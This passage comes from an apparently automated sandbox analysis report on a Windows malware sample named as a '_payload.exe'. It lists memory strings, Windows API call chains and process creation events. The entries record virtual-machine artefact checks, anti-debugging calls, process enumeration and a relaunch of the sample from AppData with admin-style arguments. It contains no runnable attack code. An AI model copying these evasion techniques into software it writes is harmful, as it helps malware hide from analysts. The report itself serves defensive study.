"VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1956219802.0000000003772000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962629426.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 11:53:18.526OFFICECL (0x1db0)0x1dd4Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 17, "Time": "2023-10-04T10:52:48Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000003.1658782762.0000000000B06000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000B06000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1676063255.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385543393.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001379000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000003.1658782762.0000000000B06000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000B06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1963130680.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 11:57:12.660OFFICECL (0x648)0x1fe0Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 20, "Time": "2023-10-04T10:57:11Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962072949.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 11:52:10.031OFFICE~1 (0x1b38)0x1748Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 13, "Time": "2023-10-04T10:52:08Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962329518.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 11:52:10.346OFFICE~1 (0x708)0x1044Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 13, "Time": "2023-10-04T10:52:10Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.0000000000886000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000886000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%((
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeAPI call chain: ExitProcess graph end nodegraph_0-38464
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00461178 rdtsc 0_2_00461178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00484168 _memset,IsDebuggerPresent,0_2_00484168
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0048A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0048A57A
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_004E1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_004E1920
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00472220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00472220
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004878D5 GetProcessHeap,0_2_004878D5
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004929EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004929EC
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004929BB SetUnhandledExceptionFilter,0_2_004929BB
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_004929EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004929EC
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_004929BB SetUnhandledExceptionFilter,2_2_004929BB
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E629EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E629EC
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E629BB SetUnhandledExceptionFilter,3_2_00E629BB
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E629EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00E629EC
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E629BB SetUnhandledExceptionFilter,4_2_00E629BB
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess created: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe "C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00461000 cpuid 0_2_00461000
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_00498178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_004A0116
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004982A2
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_0049834F
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_00498423
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,0_2_004987C8
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,0_2_0049884E
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_00497BB3
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,0_2_00497E27
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00497E83
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00497F00
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_00497F83
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00498178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_004A0116
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004982A2
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0049834F
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00498423
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,2_2_004987C8
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,2_2_0049884E
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00497BB3
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,2_2_00497E27
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00497E83
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00497F00
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00497F83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_00E68178
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00E70116
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00E682A2
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_00E6834F
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_00E68423
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,3_2_00E687C8
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,3_2_00E6884E
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,3_2_00E67BB3
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00E67E83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,3_2_00E67E27
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_00E67F83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00E67F00
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,4_2_00E68178
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00E70116
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00E682A2
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,4_2_00E6834F
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,4_2_00E68423
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,4_2_00E687C8
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,4_2_00E6884E
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,4_2_00E67BB3
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00E67E83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,4_2_00E67E27
